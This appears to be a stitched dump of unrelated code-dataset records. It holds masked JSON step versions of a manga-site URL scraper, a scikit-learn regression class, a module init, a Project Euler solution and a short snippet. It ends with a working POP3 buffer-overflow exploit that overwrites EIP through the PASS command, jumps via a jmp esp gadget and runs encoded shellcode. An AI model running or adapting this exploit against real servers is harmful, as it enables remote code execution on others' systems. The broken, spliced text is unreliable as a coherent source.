"step-2": "<mask token>\n\n\ndef _map(arg):\n key, names = arg\n size = len(names)\n urls = set()\n for index, name in enumerate(names):\n html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()\n soup = bs4.BeautifulSoup(html, 'lxml')\n for a in soup.findAll('a', href=True):\n url = a.get('href')\n if len(url) >= 2 and url[0] == '/':\n url = URL + url\n if URL not in url:\n continue\n if re.search('kai_pc_viewer\\\\?p=', url) is None:\n continue\n print(f'{key} {index}/{size} {url}')\n urls.add(url)\n return urls\n\n\n<mask token>\nfor index, name in enumerate([name.split('/').pop() for name in glob.glob(\n 'htmls/*')]):\n key = index % 12\n if args.get(key) is None:\n args[key] = []\n args[key].append(name)\n<mask token>\nwith concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:\n for _urls in exe.map(_map, args):\n [urls.add(url) for url in _urls]\nopen('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))\n",
"step-3": "<mask token>\nURL = 'http://mangamura.org'\n\n\ndef _map(arg):\n key, names = arg\n size = len(names)\n urls = set()\n for index, name in enumerate(names):\n html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()\n soup = bs4.BeautifulSoup(html, 'lxml')\n for a in soup.findAll('a', href=True):\n url = a.get('href')\n if len(url) >= 2 and url[0] == '/':\n url = URL + url\n if URL not in url:\n continue\n if re.search('kai_pc_viewer\\\\?p=', url) is None:\n continue\n print(f'{key} {index}/{size} {url}')\n urls.add(url)\n return urls\n\n\nargs = {}\nfor index, name in enumerate([name.split('/').pop() for name in glob.glob(\n 'htmls/*')]):\n key = index % 12\n if args.get(key) is None:\n args[key] = []\n args[key].append(name)\nargs = [(key, names) for key, names in args.items()]\nurls = set()\nwith concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:\n for _urls in exe.map(_map, args):\n [urls.add(url) for url in _urls]\nopen('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))\n",
"step-4": "import glob\nimport json\nimport pickle\nimport gzip\nimport os\nimport hashlib\nimport re\nimport bs4, lxml\nimport concurrent.futures\nURL = 'http://mangamura.org'\n\n\ndef _map(arg):\n key, names = arg\n size = len(names)\n urls = set()\n for index, name in enumerate(names):\n html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()\n soup = bs4.BeautifulSoup(html, 'lxml')\n for a in soup.findAll('a', href=True):\n url = a.get('href')\n if len(url) >= 2 and url[0] == '/':\n url = URL + url\n if URL not in url:\n continue\n if re.search('kai_pc_viewer\\\\?p=', url) is None:\n continue\n print(f'{key} {index}/{size} {url}')\n urls.add(url)\n return urls\n\n\nargs = {}\nfor index, name in enumerate([name.split('/').pop() for name in glob.glob(\n 'htmls/*')]):\n key = index % 12\n if args.get(key) is None:\n args[key] = []\n args[key].append(name)\nargs = [(key, names) for key, names in args.items()]\nurls = set()\nwith concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:\n for _urls in exe.map(_map, args):\n [urls.add(url) for url in _urls]\nopen('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))\n",
"step-5": "import glob\n\nimport json\n\nimport pickle\n\nimport gzip\n\nimport os\n\nimport hashlib\n\nimport re\n\nimport bs4, lxml\n\nimport concurrent.futures\nURL = 'http://mangamura.org'\ndef _map(arg):\n key, names = arg\n size = len(names)\n urls = set()\n for index, name in enumerate(names):\n html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()\n soup = bs4.BeautifulSoup(html, 'lxml')\n for a in soup.findAll('a', href=True):\n url = a.get('href')\n if len(url) >= 2 and url[0] == '/':\n url = URL + url\n if URL not in url:\n continue\n if re.search(r'kai_pc_viewer\\?p=', url) is None:\n continue\n print(f'{key} {index}/{size} {url}')\n urls.add(url)\n return urls\n\nargs = {}\nfor index, name in enumerate([name.split('/').pop() for name in glob.glob('htmls/*')]):\n key = index%12\n if args.get(key) is None:\n args[key] = []\n args[key].append( name )\nargs = [(key,names) for key, names in args.items()]\nurls = set()\nwith concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:\n for _urls in exe.map(_map,args) :\n [urls.add(url) for url in _urls]\nopen('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 4 12:14:16 2020
@author: mdevasish
"""
import pandas as pd
import numpy as np
from sklearn.linear_model import LinearRegression,Lasso,Ridge
from sklearn.metrics import mean_squared_error,mean_absolute_error
from sklearn.model_selection import train_test_split
import joblib
import seaborn as sns
import matplotlib.pyplot as plt
class model_construction:
def __init__(self,data,model,fit_intercept = True,alpha = 1.0, max_iter = 1000, solver = 'auto'):
'''
Constructor to set the values before creating the model
Input Parameters :
data : Input DataFrame
model : Model to be implemented
alpha : Regularization constant applicable for Ridge and Lasso
max_iter : Maximimum iterations applicable for Lasso
solver : Type of solver to use applicable for Ridge
'''
self.data = data
self.alpha = alpha
self.max_iter = max_iter
self.solver = solver
self.fit_intercept = fit_intercept
if model == 'LinearRegression':
self.model = LinearRegression(fit_intercept = self.fit_intercept)
elif model == 'Lasso':
self.model = Lasso(alpha = self.alpha,max_iter = self.max_iter,fit_intercept = self.fit_intercept)
elif model == 'Ridge':
self.model = Ridge(alpha = self.alpha,solver = self.solver,fit_intercept = self.fit_intercept)
else:
raise Exception('Wrong input model')
def implement_model(self,filename):
'''
Method inside the model_construction class, used for implementing the model
and return feature importance and dataframe with actual values and predicted values of validation set
Input :
tsize : size of the dataset for the validation default value 0.3
random_val : Seed for randomness for reproducibility default value 2020
Returns :
fimp : Feature importance of a model
diag : diagnostic dataframe with actual values and predicted values of validation set
'''
df = self.data
model = self.model
X,y = df.iloc[:,:-1],df.iloc[:,-1]
X_train,X_val,y_train,y_val = train_test_split(X,y,test_size = 0.3,random_state = 2020)
model.fit(X_train,y_train)
print('R square score on train set and test set are :',model.score(X_train,y_train),model.score(X_val,y_val))
print('Root mean squared error on test set is :',np.sqrt(mean_squared_error(y_val,model.predict(X_val))))
print('Mean absolute error on test set is :',mean_absolute_error(y_val,model.predict(X_val)))
fimp = pd.DataFrame(zip(X.columns,model.coef_),columns = ['feat','coeff']).sort_values(by = 'coeff',ascending = False)
fimp['abs_coeff'] = fimp['coeff'].apply(lambda x : x if x > 0 else -x)
fimp['rel'] = fimp['coeff'].apply(lambda x : 'pos' if x > 0 else 'neg')
fimp['rel'] = fimp['rel'].astype('category')
fimp = fimp.sort_values(by = 'abs_coeff',ascending = False)
pred = model.predict(X_val)
diag = pd.DataFrame(zip(y_val,pred),columns = ['Ground Truth','Predicted'])
full_name = './Models/'+filename+'.sav'
joblib.dump(model, full_name)
return fimp,diag
def plot_feat_imp(self,fimp,title):
'''
Method inside the model_construction class, used for creating a feature importance plot
Input :
fimp : Dataframe with feature importance
title : Title of the plot
Displays a plot
'''
plt.figure(figsize = (18,12))
sns.barplot(y = 'feat', x = 'abs_coeff', hue = 'rel',data = fimp)
plt.title('Feature Importance plot for '+title)
def plot_diagnostic(self,diag):
'''
Method inside the model_construction class, used for creating a diagnostic plot ground truth vs predicted
Input :
diag : Dataframe with feature importance
Displays a plot
'''
plt.figure(figsize = (18,9))
g = sns.scatterplot(x = 'Ground Truth', y = 'Predicted',data = diag)
plt.title('Ground Truth vs Predicted on validation Data')
plt.show()
|
normal
|
{
"blob_id": "f07b95a3b18aecf6cadaa8398c9158a7cd10aeeb",
"index": 7101,
"step-1": "<mask token>\n\n\nclass model_construction:\n <mask token>\n\n def implement_model(self, filename):\n \"\"\"\n Method inside the model_construction class, used for implementing the model\n and return feature importance and dataframe with actual values and predicted values of validation set\n \n Input :\n tsize : size of the dataset for the validation default value 0.3\n random_val : Seed for randomness for reproducibility default value 2020\n \n Returns :\n fimp : Feature importance of a model\n diag : diagnostic dataframe with actual values and predicted values of validation set\n \"\"\"\n df = self.data\n model = self.model\n X, y = df.iloc[:, :-1], df.iloc[:, -1]\n X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=\n 0.3, random_state=2020)\n model.fit(X_train, y_train)\n print('R square score on train set and test set are :', model.score\n (X_train, y_train), model.score(X_val, y_val))\n print('Root mean squared error on test set is :', np.sqrt(\n mean_squared_error(y_val, model.predict(X_val))))\n print('Mean absolute error on test set is :', mean_absolute_error(\n y_val, model.predict(X_val)))\n fimp = pd.DataFrame(zip(X.columns, model.coef_), columns=['feat',\n 'coeff']).sort_values(by='coeff', ascending=False)\n fimp['abs_coeff'] = fimp['coeff'].apply(lambda x: x if x > 0 else -x)\n fimp['rel'] = fimp['coeff'].apply(lambda x: 'pos' if x > 0 else 'neg')\n fimp['rel'] = fimp['rel'].astype('category')\n fimp = fimp.sort_values(by='abs_coeff', ascending=False)\n pred = model.predict(X_val)\n diag = pd.DataFrame(zip(y_val, pred), columns=['Ground Truth',\n 'Predicted'])\n full_name = './Models/' + filename + '.sav'\n joblib.dump(model, full_name)\n return fimp, diag\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass model_construction:\n\n def __init__(self, data, model, fit_intercept=True, alpha=1.0, max_iter\n =1000, solver='auto'):\n \"\"\"\n Constructor to set the values before creating the model\n \n Input Parameters :\n \n data : Input DataFrame\n model : Model to be implemented\n alpha : Regularization constant applicable for Ridge and Lasso\n max_iter : Maximimum iterations applicable for Lasso\n solver : Type of solver to use applicable for Ridge\n \n \"\"\"\n self.data = data\n self.alpha = alpha\n self.max_iter = max_iter\n self.solver = solver\n self.fit_intercept = fit_intercept\n if model == 'LinearRegression':\n self.model = LinearRegression(fit_intercept=self.fit_intercept)\n elif model == 'Lasso':\n self.model = Lasso(alpha=self.alpha, max_iter=self.max_iter,\n fit_intercept=self.fit_intercept)\n elif model == 'Ridge':\n self.model = Ridge(alpha=self.alpha, solver=self.solver,\n fit_intercept=self.fit_intercept)\n else:\n raise Exception('Wrong input model')\n\n def implement_model(self, filename):\n \"\"\"\n Method inside the model_construction class, used for implementing the model\n and return feature importance and dataframe with actual values and predicted values of validation set\n \n Input :\n tsize : size of the dataset for the validation default value 0.3\n random_val : Seed for randomness for reproducibility default value 2020\n \n Returns :\n fimp : Feature importance of a model\n diag : diagnostic dataframe with actual values and predicted values of validation set\n \"\"\"\n df = self.data\n model = self.model\n X, y = df.iloc[:, :-1], df.iloc[:, -1]\n X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=\n 0.3, random_state=2020)\n model.fit(X_train, y_train)\n print('R square score on train set and test set are :', model.score\n (X_train, y_train), model.score(X_val, y_val))\n print('Root mean squared error on test set is :', np.sqrt(\n mean_squared_error(y_val, model.predict(X_val))))\n print('Mean absolute error on test set is :', mean_absolute_error(\n y_val, model.predict(X_val)))\n fimp = pd.DataFrame(zip(X.columns, model.coef_), columns=['feat',\n 'coeff']).sort_values(by='coeff', ascending=False)\n fimp['abs_coeff'] = fimp['coeff'].apply(lambda x: x if x > 0 else -x)\n fimp['rel'] = fimp['coeff'].apply(lambda x: 'pos' if x > 0 else 'neg')\n fimp['rel'] = fimp['rel'].astype('category')\n fimp = fimp.sort_values(by='abs_coeff', ascending=False)\n pred = model.predict(X_val)\n diag = pd.DataFrame(zip(y_val, pred), columns=['Ground Truth',\n 'Predicted'])\n full_name = './Models/' + filename + '.sav'\n joblib.dump(model, full_name)\n return fimp, diag\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass model_construction:\n\n def __init__(self, data, model, fit_intercept=True, alpha=1.0, max_iter\n =1000, solver='auto'):\n \"\"\"\n Constructor to set the values before creating the model\n \n Input Parameters :\n \n data : Input DataFrame\n model : Model to be implemented\n alpha : Regularization constant applicable for Ridge and Lasso\n max_iter : Maximimum iterations applicable for Lasso\n solver : Type of solver to use applicable for Ridge\n \n \"\"\"\n self.data = data\n self.alpha = alpha\n self.max_iter = max_iter\n self.solver = solver\n self.fit_intercept = fit_intercept\n if model == 'LinearRegression':\n self.model = LinearRegression(fit_intercept=self.fit_intercept)\n elif model == 'Lasso':\n self.model = Lasso(alpha=self.alpha, max_iter=self.max_iter,\n fit_intercept=self.fit_intercept)\n elif model == 'Ridge':\n self.model = Ridge(alpha=self.alpha, solver=self.solver,\n fit_intercept=self.fit_intercept)\n else:\n raise Exception('Wrong input model')\n\n def implement_model(self, filename):\n \"\"\"\n Method inside the model_construction class, used for implementing the model\n and return feature importance and dataframe with actual values and predicted values of validation set\n \n Input :\n tsize : size of the dataset for the validation default value 0.3\n random_val : Seed for randomness for reproducibility default value 2020\n \n Returns :\n fimp : Feature importance of a model\n diag : diagnostic dataframe with actual values and predicted values of validation set\n \"\"\"\n df = self.data\n model = self.model\n X, y = df.iloc[:, :-1], df.iloc[:, -1]\n X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=\n 0.3, random_state=2020)\n model.fit(X_train, y_train)\n print('R square score on train set and test set are :', model.score\n (X_train, y_train), model.score(X_val, y_val))\n print('Root mean squared error on test set is :', np.sqrt(\n mean_squared_error(y_val, model.predict(X_val))))\n print('Mean absolute error on test set is :', mean_absolute_error(\n y_val, model.predict(X_val)))\n fimp = pd.DataFrame(zip(X.columns, model.coef_), columns=['feat',\n 'coeff']).sort_values(by='coeff', ascending=False)\n fimp['abs_coeff'] = fimp['coeff'].apply(lambda x: x if x > 0 else -x)\n fimp['rel'] = fimp['coeff'].apply(lambda x: 'pos' if x > 0 else 'neg')\n fimp['rel'] = fimp['rel'].astype('category')\n fimp = fimp.sort_values(by='abs_coeff', ascending=False)\n pred = model.predict(X_val)\n diag = pd.DataFrame(zip(y_val, pred), columns=['Ground Truth',\n 'Predicted'])\n full_name = './Models/' + filename + '.sav'\n joblib.dump(model, full_name)\n return fimp, diag\n\n def plot_feat_imp(self, fimp, title):\n \"\"\"\n Method inside the model_construction class, used for creating a feature importance plot\n \n Input :\n fimp : Dataframe with feature importance\n title : Title of the plot\n \n Displays a plot\n \"\"\"\n plt.figure(figsize=(18, 12))\n sns.barplot(y='feat', x='abs_coeff', hue='rel', data=fimp)\n plt.title('Feature Importance plot for ' + title)\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass model_construction:\n\n def __init__(self, data, model, fit_intercept=True, alpha=1.0, max_iter\n =1000, solver='auto'):\n \"\"\"\n Constructor to set the values before creating the model\n \n Input Parameters :\n \n data : Input DataFrame\n model : Model to be implemented\n alpha : Regularization constant applicable for Ridge and Lasso\n max_iter : Maximimum iterations applicable for Lasso\n solver : Type of solver to use applicable for Ridge\n \n \"\"\"\n self.data = data\n self.alpha = alpha\n self.max_iter = max_iter\n self.solver = solver\n self.fit_intercept = fit_intercept\n if model == 'LinearRegression':\n self.model = LinearRegression(fit_intercept=self.fit_intercept)\n elif model == 'Lasso':\n self.model = Lasso(alpha=self.alpha, max_iter=self.max_iter,\n fit_intercept=self.fit_intercept)\n elif model == 'Ridge':\n self.model = Ridge(alpha=self.alpha, solver=self.solver,\n fit_intercept=self.fit_intercept)\n else:\n raise Exception('Wrong input model')\n\n def implement_model(self, filename):\n \"\"\"\n Method inside the model_construction class, used for implementing the model\n and return feature importance and dataframe with actual values and predicted values of validation set\n \n Input :\n tsize : size of the dataset for the validation default value 0.3\n random_val : Seed for randomness for reproducibility default value 2020\n \n Returns :\n fimp : Feature importance of a model\n diag : diagnostic dataframe with actual values and predicted values of validation set\n \"\"\"\n df = self.data\n model = self.model\n X, y = df.iloc[:, :-1], df.iloc[:, -1]\n X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=\n 0.3, random_state=2020)\n model.fit(X_train, y_train)\n print('R square score on train set and test set are :', model.score\n (X_train, y_train), model.score(X_val, y_val))\n print('Root mean squared error on test set is :', np.sqrt(\n mean_squared_error(y_val, model.predict(X_val))))\n print('Mean absolute error on test set is :', mean_absolute_error(\n y_val, model.predict(X_val)))\n fimp = pd.DataFrame(zip(X.columns, model.coef_), columns=['feat',\n 'coeff']).sort_values(by='coeff', ascending=False)\n fimp['abs_coeff'] = fimp['coeff'].apply(lambda x: x if x > 0 else -x)\n fimp['rel'] = fimp['coeff'].apply(lambda x: 'pos' if x > 0 else 'neg')\n fimp['rel'] = fimp['rel'].astype('category')\n fimp = fimp.sort_values(by='abs_coeff', ascending=False)\n pred = model.predict(X_val)\n diag = pd.DataFrame(zip(y_val, pred), columns=['Ground Truth',\n 'Predicted'])\n full_name = './Models/' + filename + '.sav'\n joblib.dump(model, full_name)\n return fimp, diag\n\n def plot_feat_imp(self, fimp, title):\n \"\"\"\n Method inside the model_construction class, used for creating a feature importance plot\n \n Input :\n fimp : Dataframe with feature importance\n title : Title of the plot\n \n Displays a plot\n \"\"\"\n plt.figure(figsize=(18, 12))\n sns.barplot(y='feat', x='abs_coeff', hue='rel', data=fimp)\n plt.title('Feature Importance plot for ' + title)\n\n def plot_diagnostic(self, diag):\n \"\"\"\n Method inside the model_construction class, used for creating a diagnostic plot ground truth vs predicted\n \n Input :\n diag : Dataframe with feature importance\n \n Displays a plot\n \"\"\"\n plt.figure(figsize=(18, 9))\n g = sns.scatterplot(x='Ground Truth', y='Predicted', data=diag)\n plt.title('Ground Truth vs Predicted on validation Data')\n plt.show()\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 4 12:14:16 2020\n\n@author: mdevasish\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression,Lasso,Ridge\nfrom sklearn.metrics import mean_squared_error,mean_absolute_error\nfrom sklearn.model_selection import train_test_split\nimport joblib\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nclass model_construction:\n \n def __init__(self,data,model,fit_intercept = True,alpha = 1.0, max_iter = 1000, solver = 'auto'):\n '''\n Constructor to set the values before creating the model\n \n Input Parameters :\n \n data : Input DataFrame\n model : Model to be implemented\n alpha : Regularization constant applicable for Ridge and Lasso\n max_iter : Maximimum iterations applicable for Lasso\n solver : Type of solver to use applicable for Ridge\n \n '''\n self.data = data\n self.alpha = alpha\n self.max_iter = max_iter\n self.solver = solver\n self.fit_intercept = fit_intercept\n if model == 'LinearRegression':\n self.model = LinearRegression(fit_intercept = self.fit_intercept)\n elif model == 'Lasso':\n self.model = Lasso(alpha = self.alpha,max_iter = self.max_iter,fit_intercept = self.fit_intercept)\n elif model == 'Ridge':\n self.model = Ridge(alpha = self.alpha,solver = self.solver,fit_intercept = self.fit_intercept)\n else:\n raise Exception('Wrong input model')\n \n def implement_model(self,filename):\n '''\n Method inside the model_construction class, used for implementing the model\n and return feature importance and dataframe with actual values and predicted values of validation set\n \n Input :\n tsize : size of the dataset for the validation default value 0.3\n random_val : Seed for randomness for reproducibility default value 2020\n \n Returns :\n fimp : Feature importance of a model\n diag : diagnostic dataframe with actual values and predicted values of validation set\n '''\n df = self.data\n model = self.model\n \n \n X,y = df.iloc[:,:-1],df.iloc[:,-1]\n X_train,X_val,y_train,y_val = train_test_split(X,y,test_size = 0.3,random_state = 2020)\n \n model.fit(X_train,y_train)\n \n print('R square score on train set and test set are :',model.score(X_train,y_train),model.score(X_val,y_val))\n print('Root mean squared error on test set is :',np.sqrt(mean_squared_error(y_val,model.predict(X_val))))\n print('Mean absolute error on test set is :',mean_absolute_error(y_val,model.predict(X_val)))\n \n fimp = pd.DataFrame(zip(X.columns,model.coef_),columns = ['feat','coeff']).sort_values(by = 'coeff',ascending = False)\n fimp['abs_coeff'] = fimp['coeff'].apply(lambda x : x if x > 0 else -x)\n fimp['rel'] = fimp['coeff'].apply(lambda x : 'pos' if x > 0 else 'neg')\n fimp['rel'] = fimp['rel'].astype('category')\n fimp = fimp.sort_values(by = 'abs_coeff',ascending = False)\n \n pred = model.predict(X_val)\n diag = pd.DataFrame(zip(y_val,pred),columns = ['Ground Truth','Predicted'])\n \n full_name = './Models/'+filename+'.sav'\n joblib.dump(model, full_name)\n return fimp,diag\n\n def plot_feat_imp(self,fimp,title):\n '''\n Method inside the model_construction class, used for creating a feature importance plot\n \n Input :\n fimp : Dataframe with feature importance\n title : Title of the plot\n \n Displays a plot\n '''\n plt.figure(figsize = (18,12))\n sns.barplot(y = 'feat', x = 'abs_coeff', hue = 'rel',data = fimp)\n plt.title('Feature Importance plot for '+title)\n \n def plot_diagnostic(self,diag):\n '''\n Method inside the model_construction class, used for creating a diagnostic plot ground truth vs predicted\n \n Input :\n diag : Dataframe with feature importance\n \n Displays a plot\n '''\n \n plt.figure(figsize = (18,9))\n g = sns.scatterplot(x = 'Ground Truth', y = 'Predicted',data = diag)\n plt.title('Ground Truth vs Predicted on validation Data')\n plt.show()\n",
"step-ids": [
2,
3,
4,
5,
7
]
}
|
[
2,
3,
4,
5,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__all__ = ['MimicExplainer']
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from .mimic_explainer import MimicExplainer
__all__ = ['MimicExplainer']
<|reserved_special_token_1|>
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
"""Module for mimic explainer and explainable surrogate models."""
from .mimic_explainer import MimicExplainer
__all__ = ["MimicExplainer"]
|
flexible
|
{
"blob_id": "0b8cb522c531ac84d363b569a3ea4bfe47f61993",
"index": 5390,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n__all__ = ['MimicExplainer']\n",
"step-3": "<mask token>\nfrom .mimic_explainer import MimicExplainer\n__all__ = ['MimicExplainer']\n",
"step-4": "# ---------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# ---------------------------------------------------------\n\n\"\"\"Module for mimic explainer and explainable surrogate models.\"\"\"\nfrom .mimic_explainer import MimicExplainer\n\n__all__ = [\"MimicExplainer\"]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
"""
Consider all integer combinations of ab for 2 ≤ a ≤ 5 and 2 ≤ b ≤ 5:
22=4, 23=8, 24=16, 25=32
32=9, 33=27, 34=81, 35=243
42=16, 43=64, 44=256, 45=1024
52=25, 53=125, 54=625, 55=3125
If they are then placed in numerical order, with any repeats removed, we get the following sequence of 15 distinct terms:
4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125
How many distinct terms are in the sequence generated by ab for 2 ≤ a ≤ 100 and 2 ≤ b ≤ 100?
"""
import itertools
def euler_29(max_a, max_b):
gen = (a ** b for a, b in itertools.product(range(2, max_a + 1), range(2, max_b + 1)))
return len(set(gen))
if __name__ == "__main__":
print(euler_29(100, 100))
|
normal
|
{
"blob_id": "c93bd042340a6e1d0124d8f6176bdf17ab56e405",
"index": 2229,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef euler_29(max_a, max_b):\n gen = (a ** b for a, b in itertools.product(range(2, max_a + 1), range(\n 2, max_b + 1)))\n return len(set(gen))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef euler_29(max_a, max_b):\n gen = (a ** b for a, b in itertools.product(range(2, max_a + 1), range(\n 2, max_b + 1)))\n return len(set(gen))\n\n\nif __name__ == '__main__':\n print(euler_29(100, 100))\n",
"step-4": "<mask token>\nimport itertools\n\n\ndef euler_29(max_a, max_b):\n gen = (a ** b for a, b in itertools.product(range(2, max_a + 1), range(\n 2, max_b + 1)))\n return len(set(gen))\n\n\nif __name__ == '__main__':\n print(euler_29(100, 100))\n",
"step-5": "#!/usr/bin/env python\n\"\"\"\nConsider all integer combinations of ab for 2 ≤ a ≤ 5 and 2 ≤ b ≤ 5:\n\n 22=4, 23=8, 24=16, 25=32\n 32=9, 33=27, 34=81, 35=243\n 42=16, 43=64, 44=256, 45=1024\n 52=25, 53=125, 54=625, 55=3125\n\nIf they are then placed in numerical order, with any repeats removed, we get the following sequence of 15 distinct terms:\n\n4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125\n\nHow many distinct terms are in the sequence generated by ab for 2 ≤ a ≤ 100 and 2 ≤ b ≤ 100?\n\"\"\"\n\nimport itertools\n\ndef euler_29(max_a, max_b):\n gen = (a ** b for a, b in itertools.product(range(2, max_a + 1), range(2, max_b + 1)))\n return len(set(gen))\n\nif __name__ == \"__main__\":\n print(euler_29(100, 100))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(5):
arr.append(int(input()))
print(min(arr[0], arr[1], arr[2]) + min(arr[3], arr[4]) - 50)
<|reserved_special_token_1|>
arr = []
for i in range(5):
arr.append(int(input()))
print(min(arr[0], arr[1], arr[2]) + min(arr[3], arr[4]) - 50)
|
flexible
|
{
"blob_id": "8745855d86dcdabe55f8d1622b66b3613dbfe3e1",
"index": 4015,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(5):\n arr.append(int(input()))\nprint(min(arr[0], arr[1], arr[2]) + min(arr[3], arr[4]) - 50)\n",
"step-3": "arr = []\nfor i in range(5):\n arr.append(int(input()))\nprint(min(arr[0], arr[1], arr[2]) + min(arr[3], arr[4]) - 50)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/bin/env python2
import socket
import struct
RHOST = "10.10.10.2"
RPORT = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
# OFFSETS
# EIP 4654
# ESP 342
# EBP 4650
# jmp_esp in slmfc.dll at 5f4a358f
jmp_esp = 0x5f4a358f
nop_sled = "\x90" * 32
buf_totlen = 5000
offset_srp = 4654
shellcode_calc = b""
shellcode_calc += b"\xba\xd5\x90\xd2\x7d\xdb\xd5\xd9\x74\x24"
shellcode_calc += b"\xf4\x58\x31\xc9\xb1\x36\x31\x50\x13\x83"
shellcode_calc += b"\xe8\xfc\x03\x50\xda\x72\x27\x81\x0c\xf0"
shellcode_calc += b"\xc8\x7a\xcc\x95\x41\x9f\xfd\x95\x36\xeb"
shellcode_calc += b"\xad\x25\x3c\xb9\x41\xcd\x10\x2a\xd2\xa3"
shellcode_calc += b"\xbc\x5d\x53\x09\x9b\x50\x64\x22\xdf\xf3"
shellcode_calc += b"\xe6\x39\x0c\xd4\xd7\xf1\x41\x15\x10\xef"
shellcode_calc += b"\xa8\x47\xc9\x7b\x1e\x78\x7e\x31\xa3\xf3"
shellcode_calc += b"\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80"
shellcode_calc += b"\x04\x38\x4c\xb9\x0c\x22\x91\x84\xc7\xd9"
shellcode_calc += b"\x61\x72\xd6\x0b\xb8\x7b\x75\x72\x75\x8e"
shellcode_calc += b"\x87\xb2\xb1\x71\xf2\xca\xc2\x0c\x05\x09"
shellcode_calc += b"\xb9\xca\x80\x8a\x19\x98\x33\x77\x98\x4d"
shellcode_calc += b"\xa5\xfc\x96\x3a\xa1\x5b\xba\xbd\x66\xd0"
shellcode_calc += b"\xc6\x36\x89\x37\x4f\x0c\xae\x93\x14\xd6"
shellcode_calc += b"\xcf\x82\xf0\xb9\xf0\xd5\x5b\x65\x55\x9d"
shellcode_calc += b"\x71\x72\xe4\xfc\x1f\x85\x7a\x7b\x6d\x85"
shellcode_calc += b"\x84\x84\xc1\xee\xb5\x0f\x8e\x69\x4a\xda"
shellcode_calc += b"\xeb\x96\xa8\xcf\x01\x3f\x75\x9a\xa8\x22"
shellcode_calc += b"\x86\x70\xee\x5a\x05\x71\x8e\x98\x15\xf0"
shellcode_calc += b"\x8b\xe5\x91\xe8\xe1\x76\x74\x0f\x56\x76"
shellcode_calc += b"\x5d\x61\x3d\xfc\x7e\x0b\xce\x99\x0c\xd3"
shellcode_calc += b"\x1f\x03\x95\x77\x7f\xa5\x34\x13\x1a\x09"
shellcode_calc += b"\xd1\x82\x8f\x2c\x2f\x35\x2e\xdc\x3c\xb5"
buf = ""
buf += "A" * (offset_srp - len(buf))
buf += struct.pack("<I", jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += "D"*(buf_totlen - len(buf))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buf + '\r\n')
data = s.recv(1024)
s.close
|
normal
|
{
"blob_id": "280a4e1fb35937bb5a5c604f69337d30a4b956a9",
"index": 6302,
"step-1": "<mask token>\n",
